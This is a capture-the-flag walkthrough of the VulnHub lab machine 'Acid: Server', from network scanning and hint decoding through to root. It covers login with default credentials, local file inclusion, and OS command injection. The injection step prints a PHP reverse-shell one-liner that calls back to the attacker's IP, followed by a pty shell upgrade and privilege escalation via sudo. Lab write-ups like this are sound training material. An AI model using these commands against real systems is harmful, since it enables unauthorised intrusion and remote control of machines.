Acid: Server is the first machine that I took from vulnhub, and it was quite interesting to crack. It is a first machine in Acid series. The difficulty, though not mentioned by Avinash Kumar Thapa, is just above easy level.
You can download the machine from here: https://www.vulnhub.com/entry/acid-server,125/
The Goal – Escalate the privileges to root and capture the flag.
Lets get started:
After booting the Acid Server VM, first we need to identify the target machine. Use netdicover to find the IP address for Acid server.
Now we run nmap on the target to find more about the server.
Only port 33447, running httpd service was found to be open. Open a browser and enter the address 192.168.9.129:33447. This gives us the welcome page.
The page had nothing except notice the title of the page. It says /Challenge. It is a directory, append it to the url to access it.
We get a login page. Before trying for injection here lets check the source code for any info (like commented username-password).
Here we see an unusual random string in the Doctype declaration. Also it is using some kind of javascript library for login forms.
Going with the random string first. Applying rot13 and reversing the string we get acid.txt. We open the file and found /protected_page.php written in it.
Opening proteceted_page.php landed us at a dead end. It says that we are not authorized to access this page.
In order to login, we now go with the javascript library, to find what mechanism it uses for authentication. The file forms.js – script hold copyright to peredur.net.
Little bit of searching on google gave us the default credentials for the setup. Refer this link: https://github.com/peredurabefrog/phpSecureLogin/blob/master/README.md
Username: test_user
Email: test@example.com
Password: 6ZaxN2Vzm9NUJT2y
Trying with above credentials authenticated us successfully and we landed to the same protected_page.php but this time with a better message.
The admin panel has a link that says “Click Here to Proceed Further”. Go ahead and click that link. The next page is include.php, which is vulnerable to LFI.
The result of the file requested is not visible in the page, but in the source code.
The source code also has a commented hexadecimal string at the bottom of the page.
Coverting it to ASCII give Y3VjLnJ4bnA= which is then base64 decoded to retreive cuc.rxnp. Performing rot13 and reversing it we get cake.php.
cake.php page gives us another directory /Magic_Box in its title. Accessing to this directory we, get a nice 403 forbidden error.
Time to use dirbuster to know more about this directory.
Running dirbuster on /Challenge/Magic_Box gives us few files in it. The one which was found to be helpful was command.php
The page command.php provide us with a functionality to ping a host and is vulnerable to OS command injection. Did page title say reverse? So without any delay, run a listener on the attacking machine and enter the following command in the page to take the shell.
; php -r ‘$sock=fsockopen(“192.168.9.128”,4444);exec(“/bin/bash -i <&3 >&3 2>&3”);’
Replace the ip and listener port with yours.
We get the shell with www-data user. Also this is a non interactive shell and we need an interactive one. Without interaction, the OS cannot ask for password and su wont work. I created a small pyhton script with the following code and executed it.
import pty; pty.spawn(“/bin/bash”)
Executing it will give you an interactive shell. Run su command to check if it is interacting.
Start checking for files in the system. We found an unusual directory s.bin in system root. It contains a file investigate.php whose content ask us to behave like an investigator to catch the culprit.
Next look for home directories of local users. Access to root’s home directory was denied. Home directory of user ‘acid’ has a hidden file .sudo_as_admin_ successful of 0 byte. This could be a hint that local users are also sudoers and can switch to admin.
Now wee need to escalate to a local user. Further looking into filesystem, we found a directory raw_vs_isi inside /sbin. It contains a pcap file hint.pcapng.
Analysing 6000+ packets in the file, we found something about a ‘culprit’.
Saman is the culprit and he known by name 1337hax0r
So trying with ‘1337hax0r’ as password for the user ‘saman’, we get the access to this user. And from a previous hint sudo as admin successful, we simply ‘sudo su’ and get the root with a Congratulations banner.
We still have to find the flag. Start with root’s home directory. It contains only one file flag.txt. Open the file and we get a message that we successfully completed the challenge.
Note: There are multiple ways to complete this challenge right from the first webpage. Readers are encouraged to try capturing the flag with other ways.
Jasper & Garrison 